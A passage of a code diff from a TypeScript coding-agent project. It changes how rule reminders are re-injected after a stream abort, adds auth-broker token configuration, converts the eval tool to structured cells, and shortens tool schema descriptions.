=> { - if (this.#ttsrRetryToken !== retryToken) { - this.#resolveTtsrResume(); - return; - } + } else { + // Queue rules for injection; mark as injected only after successful enqueue. + this.#addPendingTtsrInjections(matches); - const targetAssistantIndex = this.#findTtsrAssistantIndex(targetMessageTimestamp); - if ( - !this.#ttsrAbortPending || - this.#promptGeneration !== generation || - targetAssistantIndex === -1 - ) { + if (shouldInterrupt) { + // Abort the stream immediately — do not gate on extension callbacks + this.#ttsrAbortPending = true; + this.#ensureTtsrResumePromise(); + this.agent.abort(); + // Notify extensions (fire-and-forget, does not block abort) + this.#emitSessionEvent({ type: "ttsr_triggered", rules: matches }).catch(() => {}); + // Schedule retry after a short delay + const retryToken = ++this.#ttsrRetryToken; + const generation = this.#promptGeneration; + const targetMessageTimestamp = + event.message.role === "assistant" ? event.message.timestamp : undefined; + this.#schedulePostPromptTask( + async () => { + if (this.#ttsrRetryToken !== retryToken) { + this.#resolveTtsrResume(); + return; + } + + const targetAssistantIndex = this.#findTtsrAssistantIndex(targetMessageTimestamp); + if ( + !this.#ttsrAbortPending || + this.#promptGeneration !== generation || + targetAssistantIndex === -1 + ) { + this.#ttsrAbortPending = false; + this.#pendingTtsrInjections = []; + this.#perToolTtsrInjections.clear(); + this.#resolveTtsrResume(); + return; + } this.#ttsrAbortPending = false; - this.#pendingTtsrInjections = []; - this.#resolveTtsrResume(); - return; - } - this.#ttsrAbortPending = false; - const ttsrSettings = this.#ttsrManager?.getSettings(); - if (ttsrSettings?.contextMode === "discard") { - // Remove the partial/aborted assistant turn from agent state - this.agent.replaceMessages(this.agent.state.messages.slice(0, targetAssistantIndex)); - } - // Inject TTSR rules as system reminder before retry - const injection = this.#getTtsrInjectionContent(); - if (injection) { - const details = { rules: injection.rules.map(rule => rule.name) }; - this.agent.appendMessage({ - role: "custom", - customType: "ttsr-injection", - content: injection.content, - display: false, - details, - attribution: "agent", - timestamp: Date.now(), - }); - this.sessionManager.appendCustomMessageEntry( - "ttsr-injection", - injection.content, - false, - details, - "agent", - ); - this.#markTtsrInjected(details.rules); - } - try { - await this.agent.continue(); - } catch { - this.#resolveTtsrResume(); - } - }, - { delayMs: 50 }, - ); - return; + this.#perToolTtsrInjections.clear(); + const ttsrSettings = this.#ttsrManager?.getSettings(); + if (ttsrSettings?.contextMode === "discard") { + // Remove the partial/aborted assistant turn from agent state + this.agent.replaceMessages(this.agent.state.messages.slice(0, targetAssistantIndex)); + } + // Inject TTSR rules as system reminder before retry + const injection = this.#getTtsrInjectionContent(); + if (injection) { + const details = { rules: injection.rules.map(rule => rule.name) }; + this.agent.appendMessage({ + role: "custom", + customType: "ttsr-injection", + content: injection.content, + display: false, + details, + attribution: "agent", + timestamp: Date.now(), + }); + this.sessionManager.appendCustomMessageEntry( + "ttsr-injection", + injection.content, + false, + details, + "agent", + ); + this.#markTtsrInjected(details.rules); + } + try { + await this.agent.continue(); + } catch { + this.#resolveTtsrResume(); + } + }, + { delayMs: 50 }, + ); + return; + } } } } @@ -1805,6 +1836,61 @@ export class AgentSession { } } + /** Tool-call id whose argument deltas triggered a TTSR match, when known. */ + #extractTtsrToolCallId(matchContext: TtsrMatchContext): string | undefined { + if (matchContext.source !== "tool") return undefined; + const key = matchContext.streamKey; + if (typeof key !== "string" || !key.startsWith("toolcall:")) return undefined; + const id = key.slice("toolcall:".length); + return id.length > 0 ? id : undefined; + } + + #addPerToolTtsrInjections(toolCallId: string, rules: Rule[]): void { + const bucket = this.#perToolTtsrInjections.get(toolCallId) ?? []; + const seen = new Set(bucket.map(rule => rule.name)); + // Dedupe against rules already bucketed for other tool calls in this + // same assistant message so one rule attaches to exactly one tool call. + const claimedElsewhere = new Set<string>(); + for (const [otherId, otherBucket] of this.#perToolTtsrInjections) { + if (otherId === toolCallId) continue; + for (const rule of otherBucket) claimedElsewhere.add(rule.name); + } + const newlyAdded: string[] = []; + for (const rule of rules) { + if (seen.has(rule.name) || claimedElsewhere.has(rule.name)) continue; + bucket.push(rule); + seen.add(rule.name); + newlyAdded.push(rule.name); + } + if (bucket.length === 0) return; + this.#perToolTtsrInjections.set(toolCallId, bucket); + // Claim the rules in the TTSR manager so subsequent deltas in this same + // turn (e.g. a sibling tool call's argument stream) don't re-match them. + // Persistence still happens in #ttsrAfterToolCall when the tool actually + // produces a result we can fold the reminder into. + if (newlyAdded.length > 0) { + this.#ttsrManager?.markInjectedByNames(newlyAdded); + } + } + + /** `afterToolCall` hook: fold any per-tool TTSR reminders into the result. */ + #ttsrAfterToolCall(ctx: AfterToolCallContext): AfterToolCallResult | undefined { + const rules = this.#perToolTtsrInjections.get(ctx.toolCall.id); + if (!rules || rules.length === 0) return undefined; + this.#perToolTtsrInjections.delete(ctx.toolCall.id); + const reminder = rules + .map(r => prompt.render(ttsrToolReminderTemplate, { name: r.name, path: r.path, content: r.content })) + .join("\n\n"); + // The TTSR manager was already claimed at bucket time; only persistence remains. + const ruleNames = rules.map(r => r.name.trim()).filter(n => n.length > 0); + if (ruleNames.length > 0) { + this.sessionManager.appendTtsrInjection(ruleNames); + } + return { + content: [{ type: "text", text: reminder }, ...ctx.result.content], + }; + } + #extractTtsrRuleNames(details: unknown): string[] { if (!details || typeof details !== "object" || Array.isArray(details)) { return []; @@ -1855,6 +1941,11 @@ export class AgentSession { } #queueDeferredTtsrInjectionIfNeeded(assistantMsg: AssistantMessage): void { + if (assistantMsg.stopReason === "aborted" || assistantMsg.stopReason === "error") { + // Tools that hadn't started by abort/error will never produce results to + // fold injections into — drop their stale per-tool entries. + this.#perToolTtsrInjections.clear(); + } if (this.#ttsrAbortPending || this.#pendingTtsrInjections.length === 0) { return; } @@ -8070,11 +8161,12 @@ export class AgentSession { }; } - async fetchUsageReports(): Promise<UsageReport[] | null> { + async fetchUsageReports(signal?: AbortSignal): Promise<UsageReport[] | null> { const authStorage = this.#modelRegistry.authStorage; if (!authStorage.fetchUsageReports) return null; return authStorage.fetchUsageReports({ baseUrlResolver: provider => this.#modelRegistry.getProviderBaseUrl?.(provider), + signal, }); } diff --git a/packages/coding-agent/src/session/agent-storage.ts b/packages/coding-agent/src/session/agent-storage.ts index 7af2dac44..3def35979 100644 --- a/packages/coding-agent/src/session/agent-storage.ts +++ b/packages/coding-agent/src/session/agent-storage.ts @@ -1,7 +1,12 @@ import { Database, type Statement } from "bun:sqlite"; import * as fs from "node:fs"; import * as path from "node:path"; -import { type AuthCredential, AuthCredentialStore, type StoredAuthCredential } from "@oh-my-pi/pi-ai"; +import { + type AuthCredential, + type AuthCredentialStore, + SqliteAuthCredentialStore, + type StoredAuthCredential, +} from "@oh-my-pi/pi-ai"; import { getAgentDbPath, isRecord, logger } from "@oh-my-pi/pi-utils"; import type { RawSettings as Settings } from "../config/settings"; @@ -57,7 +62,7 @@ export class AgentStorage { this.#hardenPermissions(dbPath); // Create AuthCredentialStore with our open database - this.#authStore = new AuthCredentialStore(this.#db); + this.#authStore = new SqliteAuthCredentialStore(this.#db); this.#listSettingsStmt = this.#db.prepare("SELECT key, value FROM settings"); this.#upsertModelUsageStmt = this.#db.prepare( diff --git a/packages/coding-agent/src/session/auth-broker-config.ts b/packages/coding-agent/src/session/auth-broker-config.ts new file mode 100644 index 000000000..33d543050 --- /dev/null +++ b/packages/coding-agent/src/session/auth-broker-config.ts @@ -0,0 +1,102 @@ +/** + * Resolve auth-broker connection configuration for the local omp client. + * + * Precedence (highest first): + * 1. `OMP_AUTH_BROKER_URL` / `OMP_AUTH_BROKER_TOKEN` env vars. + * 2. `auth.broker.url` / `auth.broker.token` in `~/.omp/agent/config.yml` + * (hidden from the settings UI; `!command` resolution supported). + * 3. Token file `~/.omp/auth-broker.token` (paired with URL from env or config). + * + * Returns null when no broker URL is configured — caller falls back to the + * local SQLite store. + * + * Reads config.yml directly (instead of going through `Settings.init`) because + * `discoverAuthStorage` runs before the settings singleton is initialized in + * `runRootCommand`, and we want hand-edited config entries to be honoured at + * boot without forcing a startup reorder. + */ +import * as path from "node:path"; +import { getAgentDir, getConfigRootDir, isEnoent, logger } from "@oh-my-pi/pi-utils"; +import { YAML } from "bun"; +import { resolveConfigValue } from "../config/resolve-config-value"; + +export interface AuthBrokerClientConfig { + url: string; + token: string; +} + +/** Path to the local bearer token file. Created on the broker host by `omp auth-broker token`. */ +export function getAuthBrokerTokenFilePath(): string { + return path.join(getConfigRootDir(), "auth-broker.token"); +} + +async function readTokenFile(): Promise<string | null> { + try { + const raw = await Bun.file(getAuthBrokerTokenFilePath()).text(); + const trimmed = raw.trim(); + return trimmed.length > 0 ? trimmed : null; + } catch (err) { + if (isEnoent(err)) return null; + logger.warn("auth-broker token file unreadable", { error: String(err) }); + return null; + } +} + +interface ConfigSnapshot { + url?: string; + token?: string; +} + +async function readConfigYaml(): Promise<ConfigSnapshot> { + const configPath = path.join(getAgentDir(), "config.yml"); + try { + const raw = await Bun.file(configPath).text(); + const parsed = YAML.parse(raw); + if (!parsed || typeof parsed !== "object" || Array.isArray(parsed)) return {}; + const record = parsed as Record<string, unknown>; + const url = typeof record["auth.broker.url"] === "string" ? (record["auth.broker.url"] as string) : undefined; + const token = + typeof record["auth.broker.token"] === "string" ? (record["auth.broker.token"] as string) : undefined; + return { url, token }; + } catch (err) { + if (isEnoent(err)) return {}; + logger.warn("auth-broker config.yml unreadable", { error: String(err) }); + return {}; + } +} + +/** + * Read broker configuration. Returns null when the URL is missing + * (broker disabled — local store is used). Throws when URL is set but no + * token is available — the caller cannot fall back silently because the + * user explicitly asked to use the broker. + */ +export async function resolveAuthBrokerConfig(): Promise<AuthBrokerClientConfig | null> { + const envUrl = process.env.OMP_AUTH_BROKER_URL; + const envToken = process.env.OMP_AUTH_BROKER_TOKEN; + + let url = envUrl && envUrl.length > 0 ? envUrl : undefined; + let configToken: string | undefined; + if (!url || !envToken) { + const fromConfig = await readConfigYaml(); + if (!url && fromConfig.url) { + const resolved = await resolveConfigValue(fromConfig.url); + if (resolved && resolved.length > 0) url = resolved; + } + if (fromConfig.token) { + const resolved = await resolveConfigValue(fromConfig.token); + if (resolved && resolved.length > 0) configToken = resolved; + } + } + if (!url) return null; + + const token = + (envToken && envToken.length > 0 ? envToken : undefined) ?? configToken ?? (await readTokenFile()) ?? undefined; + if (!token) { + throw new Error( + `OMP_AUTH_BROKER_URL is set (${url}) but no bearer token is available. ` + + `Set OMP_AUTH_BROKER_TOKEN, the \`auth.broker.token\` config entry, or place one at ${getAuthBrokerTokenFilePath()}.`, + ); + } + return { url, token }; +} diff --git a/packages/coding-agent/src/session/auth-storage.ts b/packages/coding-agent/src/session/auth-storage.ts index a150eefcb..33f0d1607 100644 --- a/packages/coding-agent/src/session/auth-storage.ts +++ b/packages/coding-agent/src/session/auth-storage.ts @@ -14,4 +14,10 @@ export type { SerializedAuthStorage, StoredAuthCredential, } from "@oh-my-pi/pi-ai"; -export { AuthStorage } from "@oh-my-pi/pi-ai"; +export { + AuthBrokerClient, + AuthStorage, + REMOTE_REFRESH_SENTINEL, + RemoteAuthCredentialStore, + SqliteAuthCredentialStore, +} from "@oh-my-pi/pi-ai"; diff --git a/packages/coding-agent/src/session/streaming-output.ts b/packages/coding-agent/src/session/streaming-output.ts index fbfd125ba..88da94201 100644 --- a/packages/coding-agent/src/session/streaming-output.ts +++ b/packages/coding-agent/src/session/streaming-output.ts @@ -1,5 +1,5 @@ import type { AgentToolUpdateCallback } from "@oh-my-pi/pi-agent-core"; -import { sanitizeText } from "@oh-my-pi/pi-natives"; +import { sanitizeText } from "@oh-my-pi/pi-utils"; import { formatBytes } from "../tools/render-utils"; import { sanitizeWithOptionalSixelPassthrough } from "../utils/sixel"; diff --git a/packages/coding-agent/src/task/types.ts b/packages/coding-agent/src/task/types.ts index 1516b829f..776144249 100644 --- a/packages/coding-agent/src/task/types.ts +++ b/packages/coding-agent/src/task/types.ts @@ -57,18 +57,13 @@ export interface SubagentLifecyclePayload { index: number; } -const assignmentDescriptionForContextEnabled = - "Complete per-task instructions the subagent executes. Must follow the Target/Change/Edge Cases/Acceptance structure. Only include per-task deltas — shared background belongs in `context`."; -const assignmentDescriptionForContextDisabled = - "Complete per-task instructions the subagent executes. Must follow the Target/Change/Edge Cases/Acceptance structure, and include any background that would otherwise live in `context` since shared context is disabled in this mode."; +const assignmentDescription = "per-task instructions; self-contained"; -const createTaskItemSchema = (contextEnabled: boolean) => +const createTaskItemSchema = (_contextEnabled: boolean) => z.object({ - id: z.string().max(48).describe("CamelCase identifier, max 48 chars"), - description: z.string().describe("Short one-liner for UI display only — not seen by the subagent"), - assignment: z - .string() - .describe(contextEnabled ? assignmentDescriptionForContextEnabled : assignmentDescriptionForContextDisabled), + id: z.string().max(48).describe("camelcase identifier"), + description: z.string().describe("ui label, not seen by subagent"), + assignment: z.string().describe(assignmentDescription), }); /** Single task item for parallel execution (default shape with context enabled). */ @@ -80,44 +75,24 @@ const createTaskSchema = (options: { isolationEnabled: boolean; simpleMode: Task const itemSchema = createTaskItemSchema(contextEnabled); let schema = z.object({ - agent: z.string().describe("Agent type for all tasks in this batch"), - tasks: z - .array(itemSchema) - .describe( - contextEnabled - ? "Tasks to execute in parallel. Each must be small-scoped (3-5 files max) and self-contained given context + assignment." - : "Tasks to execute in parallel. Each must be small-scoped (3-5 files max) and fully self-contained inside assignment because shared context is disabled.", - ), + agent: z.string().describe("agent type"), + tasks: z.array(itemSchema).describe("tasks to execute in parallel"), }); - if (contextEnabled) { schema = schema.extend({ - context: z - .string() - .optional() - .describe( - "Shared background prepended to every task's assignment. Put goal, non-goals, constraints, conventions, reference paths, API contracts, and global acceptance commands here once — instead of duplicating across assignments.", - ), + context: z.string().optional().describe("shared background prepended to each assignment"), }); } if (customSchemaEnabled) { schema = schema.extend({ - schema: z - .string() - .optional() - .describe( - "JSON-encoded JTD schema defining expected response structure. Output format belongs here — never in context or assignment.", - ), + schema: z.string().optional().describe("jtd schema for expected response shape"), }); } if (options.isolationEnabled) { schema = schema.extend({ - isolated: z - .boolean() - .optional() - .describe("Run in isolated environment; returns patches. Use when tasks edit overlapping files."), + isolated: z.boolean().optional().describe("run in isolated env; returns patches"), }); } diff --git a/packages/coding-agent/src/tools/bash-interactive.ts b/packages/coding-agent/src/tools/bash-interactive.ts index da2b1743c..f8eac335d 100644 --- a/packages/coding-agent/src/tools/bash-interactive.ts +++ b/packages/coding-agent/src/tools/bash-interactive.ts @@ -1,5 +1,5 @@ import type { AgentToolContext } from "@oh-my-pi/pi-agent-core"; -import { type PtyRunResult, PtySession, sanitizeText } from "@oh-my-pi/pi-natives"; +import { type PtyRunResult, PtySession } from "@oh-my-pi/pi-natives"; import { type Component, extractPrintableText, @@ -10,6 +10,7 @@ import { truncateToWidth, visibleWidth, } from "@oh-my-pi/pi-tui"; +import { sanitizeText } from "@oh-my-pi/pi-utils"; import type { Terminal as XtermTerminalType } from "@xterm/headless"; import xterm from "@xterm/headless"; import { Settings } from "../config/settings"; diff --git a/packages/coding-agent/src/tools/browser.ts b/packages/coding-agent/src/tools/browser.ts index 8f2e2128b..d42a763f9 100644 --- a/packages/coding-agent/src/tools/browser.ts +++ b/packages/coding-agent/src/tools/browser.ts @@ -18,19 +18,16 @@ export type { Observation, ObservationEntry } from "./browser/tab-protocol"; const DEFAULT_TAB_NAME = "main"; const appSchema = z.object({ - path: z.string().describe("absolute path to a binary to spawn (single-instance reuse)").optional(), - cdp_url: z.string().describe("existing CDP endpoint to connect to (e.g. http://127.0.0.1:9222)").optional(), - args: z.array(z.string()).describe("extra CLI args when spawning").optional(), - target: z.string().describe("substring matched against url+title to pick a BrowserWindow").optional(), + path: z.string().describe("binary path to spawn").optional(), + cdp_url: z.string().describe("existing cdp endpoint").optional(), + args: z.array(z.string()).describe("extra cli args").optional(), + target: z.string().describe("substring to pick a window").optional(), }); const browserSchema = z.object({ - action: z.enum(["open", "close", "run"] as const).describe("tab/browser operation"), - name: z - .string() - .describe("tab id; default 'main'. Multiple tabs can coexist; reusable across run() calls and subagents.") - .optional(), - url: z.string().describe("open: navigate after acquiring tab").optional(), + action: z.enum(["open", "close", "run"] as const).describe("operation"), + name: z.string().describe("tab id (default 'main')").optional(), + url: z.string().describe("url to open").optional(), app: appSchema.optional(), viewport: z .object({ @@ -41,21 +38,16 @@ const browserSchema = z.object({ .optional(), wait_until: z .enum(["load", "domcontentloaded", "networkidle0", "networkidle2"] as const) - .describe("navigation wait condition for url") + .describe("navigation wait condition") .optional(), dialogs: z .enum(["accept", "dismiss"] as const) - .describe("open: auto-handle alert/confirm/beforeunload dialogs (default: leave for caller to handle)") - .optional(), - code: z - .string() - .describe( - "run: JS body executed with `page`, `browser`, `tab`, `display`, `assert`, `wait` in scope. Treated as the body of an async function. Use `display(value)` to attach text/JSON/images; the function's return value is JSON-serialized as a final block.", - ) + .describe("auto-handle dialogs") .optional(), + code: z.string().describe("js body to run in tab").optional(), timeout: z.number().default(30).describe("timeout in seconds").optional(), - all: z.boolean().describe("close: close every tab").optional(), - kill: z.boolean().describe("close: also kill spawned-app browsers (default: leave running)").optional(), + all: z.boolean().describe("close every tab").optional(), + kill: z.boolean().describe("also kill spawned-app browsers").optional(), }); /** Input schema for the browser tool. */ diff --git a/packages/coding-agent/src/tools/eval.ts b/packages/coding-agent/src/tools/eval.ts index 805091c66..a931c45fb 100644 --- a/packages/coding-agent/src/tools/eval.ts +++ b/packages/coding-agent/src/tools/eval.ts @@ -4,10 +4,8 @@ import type { Component } from "@oh-my-pi/pi-tui"; import { Markdown, Text } from "@oh-my-pi/pi-tui"; import { prompt } from "@oh-my-pi/pi-utils"; import * as z from "zod/v4"; -import { jsBackend, parseEvalInput, pythonBackend, sniffEvalLanguage } from "../eval"; +import { jsBackend, pythonBackend } from "../eval"; import type { ExecutorBackend } from "../eval/backend"; -import evalGrammar from "../eval/eval.lark" with { type: "text" }; -import { ABORT_WARNING, type ParsedEvalCell } from "../eval/parse"; import type { EvalCellResult, EvalDisplayOutput, EvalLanguage, EvalStatusEvent, EvalToolDetails } from "../eval/types"; import type { RenderResultOptions } from "../extensibility/custom-tools/types"; import { truncateToVisualLines } from "../modes/components/visual-truncate"; @@ -29,8 +27,27 @@ import { clampTimeout } from "./tool-timeouts"; export const EVAL_DEFAULT_PREVIEW_LINES = 10; +/** + * Per-cell input. Each cell runs in order; state persists within a language + * across cells and across tool calls. + */ +const evalCellSchema = z.object({ + language: z.enum(["py", "js"]).describe('runtime: "py" for the IPython kernel, "js" for the persistent JS VM'), + code: z.string().describe("cell body, verbatim. Use top-level await freely."), + title: z.string().optional().describe('short label shown in transcript (e.g. "imports", "load config")'), + timeout: z.number().int().min(1).max(600).optional().describe("per-cell timeout in seconds (1-600, default 30)"), + reset: z + .boolean() + .optional() + .describe("wipe this cell's language kernel before running. Other languages are untouched."), +}); +export type EvalCellInput = z.infer<typeof evalCellSchema>; + export const evalSchema = z.object({ - input: z.string().describe('eval input as a sequence of `*** Cell <lang>:"title"` cell headers followed by code'), + cells: z + .array(evalCellSchema) + .min(1) + .describe("cells executed in order. State persists within each language across cells and tool calls."), }); export type EvalToolParams = z.infer<typeof evalSchema>; @@ -134,7 +151,6 @@ export interface EvalToolOptions { interface ResolvedBackend { backend: ExecutorBackend; - fallback: boolean; notice?: string; } @@ -166,51 +182,21 @@ function timeoutSecondsFromMs(timeoutMs: number): number { return clampTimeout("eval", timeoutMs / 1000); } -async function resolveBackend( - session: ToolSession, - requested: EvalLanguage | undefined, - code: string, -): Promise<ResolvedBackend> { +async function resolveBackend(session: ToolSession, language: EvalLanguage): Promise<ResolvedBackend> { const allowPy = (session.settings.get("eval.py") as boolean | undefined) ?? true; const allowJs = (session.settings.get("eval.js") as boolean | undefined) ?? true; - if (requested === "python") { + if (language === "python") { if (!allowPy) throw new ToolError("Python backend is disabled (eval.py = false)."); if (!(await pythonBackend.isAvailable(session))) { throw new ToolError( 'Python backend is unavailable in this session. Pass language: "js" or install the python kernel.', ); } - return { backend: pythonBackend, fallback: false }; + return { backend: pythonBackend }; } - if (requested === "js") { - if (!allowJs) throw new ToolError("JavaScript backend is disabled (eval.js = false)."); - return { backend: jsBackend, fallback: false }; - } - // Auto-detect. - const sniffed = sniffEvalLanguage(code); - if (sniffed === "python" && allowPy && (await pythonBackend.isAvailable(session))) { - return { backend: pythonBackend, fallback: false }; - } - if (sniffed === "js" && allowJs) { - return { backend: jsBackend, fallback: false }; - } - - // Sniffer returned undefined or the preferred backend was disabled. Prefer - // python when its kernel is up, else fall back to js. - if (allowPy && (await pythonBackend.isAvailable(session))) { - const notice = - sniffed === "js" ? "JavaScript markers detected but eval.js is disabled; using Python." : undefined; - return { backend: pythonBackend, fallback: false, notice }; - } - if (allowJs) { - const notice = - sniffed === "python" - ? "Python markers detected but the python kernel is unavailable; using JavaScript." - : undefined; - return { backend: jsBackend, fallback: true, notice }; - } - throw new ToolError("No eval backend is available; enable eval.py or eval.js."); + if (!allowJs) throw new ToolError("JavaScript backend is disabled (eval.js = false)."); + return { backend: jsBackend }; } export class EvalTool implements AgentTool<typeof evalSchema> { @@ -227,20 +213,15 @@ export class EvalTool implements AgentTool<typeof evalSchema> { readonly concurrency = "exclusive"; readonly strict = true; readonly intent = (args: Partial<z.infer<typeof evalSchema>>): string | undefined => { - const input = args.input; - if (input) { - try { - const cells = parseEvalInput(input).cells; - return cells.map(cell => cell.title || `running ${cell.language}`).join("\n"); - } catch {} - } - return "evaluating"; + const cells = Array.isArray(args.cells) ? args.cells : []; + const first = cells.find(c => c && typeof c === "object"); + if (!first) return "evaluating"; + const title = typeof first.title === "string" ? first.title : undefined; + const language = typeof first.language === "string" ? first.language : "?"; + const label = title || `running ${language}`; + return cells.length > 1 ? `${label} (+${cells.length - 1})` : label; }; - get customFormat(): { syntax: "lark"; definition: string } { - return { syntax: "lark", definition: evalGrammar }; - } - readonly #proxyExecutor?: EvalProxyExecutor; constructor( @@ -266,19 +247,17 @@ export class EvalTool implements AgentTool<typeof evalSchema> { } const session = this.session; - const parsedInput = parseEvalInput(params.input); - let previousRuntimeLanguage: EvalLanguage | undefined; const cells: ResolvedEvalCell[] = []; - for (const cell of parsedInput.cells) { - const requested = cell.languageOrigin === "header" ? cell.language : (previousRuntimeLanguage ?? undefined); - const resolved = await resolveBackend(session, requested, cell.code); - previousRuntimeLanguage = resolved.backend.id; + for (let i = 0; i < params.cells.length; i++) { + const cell = params.cells[i]; + const language: EvalLanguage = cell.language === "py" ? "python" : "js"; + const resolved = await resolveBackend(session, language); cells.push({ - index: cell.index, + index: i, title: cell.title, code: cell.code, - timeoutMs: cell.timeoutMs, - reset: cell.reset, + timeoutMs: (cell.timeout ?? 30) * 1000, + reset: cell.reset ?? false, resolved, }); } @@ -462,11 +441,10 @@ export class EvalTool implements AgentTool<typeof evalSchema> { pushUpdate(); const errorMsg = result.output || "Command aborted"; const combinedOutput = cellOutputs.join("\n\n"); - const abortSuffix = parsedInput.aborted ? `\n\n${ABORT_WARNING}` : ""; const outputText = - (cells.length > 1 + cells.length > 1 ? `${combinedOutput}\n\nCell ${i + 1} aborted: ${errorMsg}` - : combinedOutput || errorMsg) + abortSuffix; + : combinedOutput || errorMsg; const summaryForMeta = await summarizeFinal(combinedOutput, finalizeOutput); const details: EvalToolDetails = { @@ -489,13 +467,12 @@ export class EvalTool implements AgentTool<typeof evalSchema> { cellResult.status = "error"; pushUpdate(); const combinedOutput = cellOutputs.join("\n\n"); - const abortSuffix = parsedInput.aborted ? `\n\n${ABORT_WARNING}` : ""; const outputText = - (cells.length > 1 + cells.length > 1 ? `${combinedOutput}\n\nCell ${i + 1} failed (exit code ${result.exitCode}). Earlier cells succeeded—their state persists. Fix only cell ${i + 1}.` : combinedOutput ? `${combinedOutput}\n\nCommand exited with code ${result.exitCode}` - : `Command exited with code ${result.exitCode}`) + abortSuffix; + : `Command exited with code ${result.exitCode}`; const summaryForMeta = await summarizeFinal(combinedOutput, finalizeOutput); const details: EvalToolDetails = { @@ -519,13 +496,12 @@ export class EvalTool implements AgentTool<typeof evalSchema> { } const combinedOutput = cellOutputs.join("\n\n"); - const abortSuffix = parsedInput.aborted ? `\n\n${ABORT_WARNING}` : ""; const hasImages = images.length > 0; const outputText = - (combinedOutput || - (hasImages - ? `(displayed ${images.length} image${images.length === 1 ? "" : "s"}; no text output)` - : "(no output)")) + abortSuffix; + combinedOutput || + (hasImages + ? `(displayed ${images.length} image${images.length === 1 ? "" : "s"}; no text output)` + : "(no output)"); const summaryForMeta = await summarizeFinal(combinedOutput, finalizeOutput); const details: EvalToolDetails = { @@ -581,8 +557,14 @@ async function summarizeFinal( }; } +interface EvalRenderCellArg { + language?: string; + code?: string; + title?: string; +} + interface EvalRenderArgs { - input?: string; + cells?: EvalRenderCellArg[]; __partialJson?: string; } @@ -593,27 +575,30 @@ interface EvalRenderContext { timeout?: number; } -function decodePartialJsonStringFragment(fragment: string): string { - let text = fragment.replace(/\\u[0-9a-fA-F]{0,3}$/, ""); - const trailingBackslashes = text.match(/\\+$/)?.[0].length ?? 0; - if (trailingBackslashes % 2 === 1) text = text.slice(0, -1); - try { - return JSON.parse(`"${text}"`) as string; - } catch { - return text; +interface EvalRenderCell { + language: EvalLanguage; + code: string; + title?: string; +} + +function normalizeRenderLanguage(value: string | undefined): EvalLanguage { + return value === "js" ? "js" : "python"; +} + +function getRenderCells(args: EvalRenderArgs | undefined): EvalRenderCell[] { + const raw = args?.cells; + if (!Array.isArray(raw)) return []; + const out: EvalRenderCell[] = []; + for (const cell of raw) { + if (!cell || typeof cell !== "object") continue; + const code = typeof cell.code === "string" ? cell.code : ""; + out.push({ + language: normalizeRenderLanguage(typeof cell.language === "string" ? cell.language : undefined), + code, + title: typeof cell.title === "string" ? cell.title : undefined, + }); } -} - -function extractPartialJsonString(partialJson: string | undefined, key: string): string | undefined { - if (!partialJson) return undefined; - const pattern = new RegExp(`"${key}"\\s*:\\s*"((?:\\\\.|[^"\\\\])*)`, "u"); - const match = pattern.exec(partialJson); - if (!match) return undefined; - return decodePartialJsonStringFragment(match[1]); -} - -function getRenderInput(args: EvalRenderArgs | undefined): string | undefined { - return args?.input ?? extractPartialJsonString(args?.__partialJson, "input"); + return out; } /** Format a status event as a single line for display. */ @@ -861,15 +846,7 @@ function formatCellOutputLines( export const evalToolRenderer = { renderCall(args: EvalRenderArgs, _options: RenderResultOptions, uiTheme: Theme): Component { - const input = getRenderInput(args); - let cells: ParsedEvalCell[] = []; - if (input) { - try { - cells = parseEvalInput(input).cells; - } catch { - cells = []; - } - } + const cells = getRenderCells(args); if (cells.length === 0) { const promptSym = uiTheme.fg("accent", ">>>"); @@ -881,7 +858,7 @@ export const evalToolRenderer = { return { render: (width: number): string[] => { - const key = `${input?.length ?? 0}`; + const key = cells.map(c => `${c.language}:${c.title ?? ""}:${c.code.length}`).join("|"); if (cached && cached.key === key && cached.width === width) { return cached.result; } diff --git a/packages/coding-agent/src/tools/gh.ts b/packages/coding-agent/src/tools/gh.ts index 02567fd5c..8b60ef247 100644 --- a/packages/coding-agent/src/tools/gh.ts +++ b/packages/coding-agent/src/tools/gh.ts @@ -213,58 +213,34 @@ const githubSchema = z "run_watch", ] as const) .describe("github operation"), - repo: z.string().describe("owner/repo (any op)").optional(), - branch: z.string().describe("branch (repo_view, pr_push local branch, run_watch)").optional(), + repo: z.string().describe("owner/repo").optional(), + branch: z.string().describe("branch").optional(), pr: z .union([z.string(), z.array(z.string())]) - .describe( - "pr number, url, or branch (pr_checkout); pass an array to batch-process multiple pull requests in one call", - ) - .optional(), - force: z.boolean().describe("reset existing local branch (pr_checkout)").optional(), - forceWithLease: z.boolean().describe("force-with-lease push (pr_push)").optional(), - title: z.string().describe("PR title (pr_create)").optional(), - body: z.string().describe("PR body markdown (pr_create); mutually exclusive with fill").optional(), - base: z.string().describe("PR base branch (pr_create); defaults to repo default branch").optional(), - head: z.string().describe("PR head branch (pr_create); defaults to current branch").optional(), - draft: z.boolean().describe("open PR as draft (pr_create)").optional(), - fill: z - .boolean() - .describe("auto-fill PR title/body from commits (pr_create); mutually exclusive with title/body") - .optional(), - reviewer: z.array(z.string()).describe("reviewers to request (pr_create); accepts users or org/team").optional(), - assignee: z.array(z.string()).describe("assignees (pr_create); use @me for the authenticated user").optional(), - label: z.array(z.string()).describe("labels to apply (pr_create)").optional(), - query: z - .string() - .describe("search query (search_issues, search_prs, search_code, search_commits, search_repos)") - .optional(), - since: z - .string() - .describe( - "lower-bound date for search_issues/search_prs/search_commits/search_repos. Accepts a relative duration (`<n><unit>` with unit `m`/`h`/`d`/`w`/`mo`/`y`, e.g. `3d`, `12h`, `2w`) or an ISO date (`YYYY-MM-DD`) / datetime. Translated to a `created:>=…` (or `committer-date:`/`pushed:`) qualifier; not supported by search_code.", - ) - .optional(), - until: z - .string() - .describe( - "upper-bound date in the same format as `since`. With both, builds a `field:since..until` range qualifier.", - ) + .describe("pr number, url, or branch") .optional(), + force: z.boolean().describe("reset existing local branch").optional(), + forceWithLease: z.boolean().describe("force-with-lease push").optional(), + title: z.string().describe("pr title").optional(), + body: z.string().describe("pr body markdown").optional(), + base: z.string().describe("pr base branch").optional(), + head: z.string().describe("pr head branch").optional(), + draft: z.boolean().describe("open pr as draft").optional(), + fill: z.boolean().describe("auto-fill pr title/body from commits").optional(), + reviewer: z.array(z.string()).describe("reviewers").optional(), + assignee: z.array(z.string()).describe("assignees").optional(), + label: z.array(z.string()).describe("labels").optional(), + query: z.string().describe("search query").optional(), + since: z.string().describe("lower-bound date filter").optional(), + until: z.string().describe("upper-bound date filter").optional(), dateField: z .enum(["created", "updated"] as const) - .describe( - "date field used by `since`/`until`. issues/prs: `created` (default) or `updated`. repos: `created` (default) or `updated` (mapped to GitHub's `pushed:`). commits: ignored — always uses 